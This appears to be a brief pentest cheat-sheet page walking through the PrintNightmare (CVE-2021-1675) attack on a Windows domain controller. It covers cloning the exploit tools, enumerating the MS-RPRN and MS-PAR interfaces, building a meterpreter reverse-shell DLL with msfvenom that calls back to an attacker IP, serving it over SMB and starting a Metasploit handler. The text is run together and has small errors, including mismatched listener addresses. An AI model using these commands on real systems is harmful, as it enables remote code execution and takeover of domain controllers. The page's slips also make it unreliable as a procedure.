print-nightmare
Install the tool
git clone https://github.com/cube0x0/CVE-2021-1675.git && pip3 uninstall impackets && git clone https://github.com/cube0x0/impacket && cd impacket && python3 ./setup.py installEnumerate MS-RPRN (check Print System Asynchronous Protocol and System Remote Protocol are exposed)
MS-RPRN (check Print System Asynchronous Protocol and System Remote Protocol are exposed) rpcdum.py @<DC_machine_IP> | egrep 'MS-RPRN|MS-PAR'Generate a DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dllCreate a SMB share
sudo smbserver.py -smb2support CompData /path/to/backupscript.dllConfig & start MSF multi/handler
Use multi/handlerSet LHOST 172.16.5.255Run the exploit
Last updated